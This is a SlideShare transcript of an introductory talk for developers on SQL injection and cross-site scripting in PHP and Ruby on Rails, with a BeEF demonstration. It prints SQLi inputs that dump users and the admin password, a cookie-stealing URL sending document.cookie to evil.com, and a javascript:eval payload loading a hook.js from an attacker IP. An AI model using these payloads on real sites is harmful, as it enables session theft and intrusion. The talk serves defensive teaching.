SlideShare a Scribd company logo

Don't Do what Derpy the Dreadful Dev Does

L
Liam O'Saurus

1) The document discusses common web application vulnerabilities like SQL injection and cross-site scripting. It demonstrates how these vulnerabilities can be exploited in PHP and Ruby on Rails applications. 2) While Ruby on Rails has security features built-in, the speaker argues these do not eliminate security risks and that all developers must take responsibility for security. 3) Popular tools like BeEF, SQLmap, and Burp Suite are demonstrated for exploiting vulnerabilities like cross-site scripting and stealing cookie sessions. The key message is that no framework can replace secure coding practices.

Technology
1 of 31
Download to read offline
Don’t Do what Derpy The Dreadful Dev Does (also - don’t let “friends” on IRC decide on your talk title) Secure Development Melbourne, 11/06/2015
whoami • @liamosaur • Penetration Tester / Consultant with Assurance • Previously: C# / Java developer
The Brief • Basic, Introductory Level talk about security • Establish some common ground between the Infosec and Dev world
Topics • Popular vulnerabilities (hopefully a recap) • Demo some tools by exploiting some vulns
OWASP Top 5/10 1. Injection (SQLi, Command injection, XXE, LDAPi etc) 2. Broken Auth / Session Management 3. Cross-Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration
SQLi basics • Inject user controlled content into dynamic SQL queries, allowing unintended access/ control of database
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo • SQL: SELECT username FROM users WHERE username=‘liamo’ • Query result: liamo
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: ' OR 'a'='a • SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’ • Query result: list of all users
SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo' UNION SELECT password FROM users WHERE username='admin • SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’ • Query result: liamo and the admin password
Cross-Site Scripting (XSS) • Inject user controlled content into dynamic web content, allowing unintended access/ control within a target browser
XSS Basics • HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam • Output: Hello, Liam!
XSS Basics • HTML: <html><body>Hello, <? php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam<script>alert(1)</ script> • Output:
XSS - Who cares? • Old school - cookie stealing • http://evil.com/cookies.php? +escape(document.cookie) • Steal session ID - game over • Less effective thanks to httpOnly cookie flag
“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now” PHP Demo!
Rails • Problem #1 - I don’t know Rails • Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
Rails • Learned Rails. Wrote a basic app • Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
Rails • Solution: Uhh.. maybe I’ll just demo XSS instead!
Rails • Problem #3: Rails has input/ output escaping magic beans that prevent XSS
• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
Rubby Demo!
Presenting: Rubby
Presenting: Rubby • Bad code • Better code
Exploiting Rubby
Rubby XSS • “link_to” is vulnerable to XSS out of the box if it displays user controlled content
Rubby XSS • Challenge for those playing at home: some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x() {var a = document.createElement('scrip t');a.setAttribute('src','htt p://192.168.57.159:3000/ hook.js');document.head.appen dChild(a);};x();");
BeEF Tunnelling Proxy BeEF SERVER 
 (http proxy) Phish with XSS hook.js Attackers Browser Victims Browser
 (XHR proxy) Target server (same domain as XSS phish)
Frameworks/Languages • PHP • Bad: No built in security • Ruby on Rails • Good: Built in security
Frameworks/Languages • PHP • Good: PHP devs know they need to take security into account • Ruby on Rails • Bad: “The framework takes care of security for me!”
Conclusions • Security is everyone’s responsibility • Your frameworks magic beans won’t save you
Questions - save for the Q&A Panel!
References • https://www.owasp.org/index.php/ Top_10_2013-Top_10 • http://rails-sqli.org/ • https://www.owasp.org/index.php/ Ruby_on_Rails_Cheatsheet • https://github.com/beefproject/beef/wiki/ Tunneling • http://sqlmap.org/

Recommended

Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
PINT Inc
 
WordPress Security Essentials
WordPress Security EssentialsWordPress Security Essentials
WordPress Security Essentials
Angela Bowman
 
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack ItLoose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
JeremyRyanKelso
 
Testers, get into security bug bounties!
Testers, get into security bug bounties!Testers, get into security bug bounties!
Testers, get into security bug bounties!
eusebiu daniel blindu
 
Be Securious – Hack Your Own Site for Better Security
Be Securious – Hack Your Own Site for Better SecurityBe Securious – Hack Your Own Site for Better Security
Be Securious – Hack Your Own Site for Better Security
securiously
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
Let’s write a plugin
Let’s write a pluginLet’s write a plugin
Let’s write a plugin
Brian Layman
 

Recommended

Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
PINT Inc
 
WordPress Security Essentials
WordPress Security EssentialsWordPress Security Essentials
WordPress Security Essentials
Angela Bowman
 
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack ItLoose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
JeremyRyanKelso
 
Testers, get into security bug bounties!
Testers, get into security bug bounties!Testers, get into security bug bounties!
Testers, get into security bug bounties!
eusebiu daniel blindu
 
Be Securious – Hack Your Own Site for Better Security
Be Securious – Hack Your Own Site for Better SecurityBe Securious – Hack Your Own Site for Better Security
Be Securious – Hack Your Own Site for Better Security
securiously
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being HackedBlog World 2010 - How to Keep Your Blog from Being Hacked
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
Let’s write a plugin
Let’s write a pluginLet’s write a plugin
Let’s write a plugin
Brian Layman
 
Keep Your SIte Secure
Keep Your SIte SecureKeep Your SIte Secure
Keep Your SIte Secure
Michele Butcher-Jones
 
The Hacker's Guide to XSS
The Hacker's Guide to XSSThe Hacker's Guide to XSS
The Hacker's Guide to XSS
Patrycja Wegrzynowicz
 
WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014
Michael Carnell
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Html5 for Security Folks
Html5 for Security FolksHtml5 for Security Folks
Html5 for Security Folks
n|u - The Open Security Community
 
orcreatehappyusers
orcreatehappyusersorcreatehappyusers
orcreatehappyusers
tutorialsruby
 
8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla
SiteGround.com
 
Analysis of web application worms and viruses
Analysis of web application worms and virusesAnalysis of web application worms and viruses
Analysis of web application worms and viruses
UltraUploader
 
Screw HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIRScrew HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIR
Eric Fickes
 
Intro to Yo
Intro to YoIntro to Yo
Intro to Yo
Shawn Rider
 
Progressive Enhancement
Progressive EnhancementProgressive Enhancement
Progressive Enhancement
Zach Leatherman
 
Selenium Online Training
Selenium Online TrainingSelenium Online Training
Selenium Online Training
Learntek1
 
Lecture1
Lecture1Lecture1
Lecture1
Anton Yatsenko
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
Stephan Steynfaardt
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015
Christian Heilmann
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
Demystifying WordPress
Demystifying WordPressDemystifying WordPress
Demystifying WordPress
Mykl Roventine
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystacks
snyff
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 

More Related Content

What's hot

Keep Your SIte Secure
Keep Your SIte SecureKeep Your SIte Secure
Keep Your SIte Secure
Michele Butcher-Jones
 
The Hacker's Guide to XSS
The Hacker's Guide to XSSThe Hacker's Guide to XSS
The Hacker's Guide to XSS
Patrycja Wegrzynowicz
 
WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014
Michael Carnell
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Html5 for Security Folks
Html5 for Security FolksHtml5 for Security Folks
Html5 for Security Folks
n|u - The Open Security Community
 
orcreatehappyusers
orcreatehappyusersorcreatehappyusers
orcreatehappyusers
tutorialsruby
 
8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla
SiteGround.com
 
Analysis of web application worms and viruses
Analysis of web application worms and virusesAnalysis of web application worms and viruses
Analysis of web application worms and viruses
UltraUploader
 
Screw HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIRScrew HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIR
Eric Fickes
 
Intro to Yo
Intro to YoIntro to Yo
Intro to Yo
Shawn Rider
 
Progressive Enhancement
Progressive EnhancementProgressive Enhancement
Progressive Enhancement
Zach Leatherman
 
Selenium Online Training
Selenium Online TrainingSelenium Online Training
Selenium Online Training
Learntek1
 
Lecture1
Lecture1Lecture1
Lecture1
Anton Yatsenko
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
Stephan Steynfaardt
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 
The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015
Christian Heilmann
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
Volkan Özçelik
 
Demystifying WordPress
Demystifying WordPressDemystifying WordPress
Demystifying WordPress
Mykl Roventine
 

What's hot (19)

Keep Your SIte Secure
Keep Your SIte SecureKeep Your SIte Secure
Keep Your SIte Secure
 
The Hacker's Guide to XSS
The Hacker's Guide to XSSThe Hacker's Guide to XSS
The Hacker's Guide to XSS
 
WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014WordPress Setup and Security - WordCamp, Charleston 2014
WordPress Setup and Security - WordCamp, Charleston 2014
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Html5 for Security Folks
Html5 for Security FolksHtml5 for Security Folks
Html5 for Security Folks
 
orcreatehappyusers
orcreatehappyusersorcreatehappyusers
orcreatehappyusers
 
8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla8 Simple Ways to Hack Your Joomla
8 Simple Ways to Hack Your Joomla
 
Analysis of web application worms and viruses
Analysis of web application worms and virusesAnalysis of web application worms and viruses
Analysis of web application worms and viruses
 
Screw HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIRScrew HTML5, make cool shit with AIR
Screw HTML5, make cool shit with AIR
 
Intro to Yo
Intro to YoIntro to Yo
Intro to Yo
 
Progressive Enhancement
Progressive EnhancementProgressive Enhancement
Progressive Enhancement
 
Selenium Online Training
Selenium Online TrainingSelenium Online Training
Selenium Online Training
 
Lecture1
Lecture1Lecture1
Lecture1
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 
The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015The ES6 Conundrum - All Things Open 2015
The ES6 Conundrum - All Things Open 2015
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Demystifying WordPress
Demystifying WordPressDemystifying WordPress
Demystifying WordPress
 

Similar to Don't Do what Derpy the Dreadful Dev Does

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystacks
snyff
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
Jim Manico
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
CODE BLUE
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
SecuRing
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
Mateusz Olejarka
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
Markus Eisele
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Michael Pirnat
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
Steve Poole
 
Confidence web
Confidence webConfidence web
Confidence web
Dan Kaminsky
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
snyff
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionEsage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
Niall Merrigan
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
Darren Duke
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
kriptonium
 

Similar to Don't Do what Derpy the Dreadful Dev Does (20)

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystacks
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFish
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
 
Confidence web
Confidence webConfidence web
Confidence web
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionEsage on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
 
Joomla! security jday2015
Joomla! security jday2015Joomla! security jday2015
Joomla! security jday2015
 

Recently uploaded

Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
Intelisync
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Jeffrey Haguewood
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Alpen-Adria-Universität
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
alexjohnson7307
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
GDSC PJATK
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Jeffrey Haguewood
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
flufftailshop
 

Recently uploaded (20)

Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing InstancesEnergy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
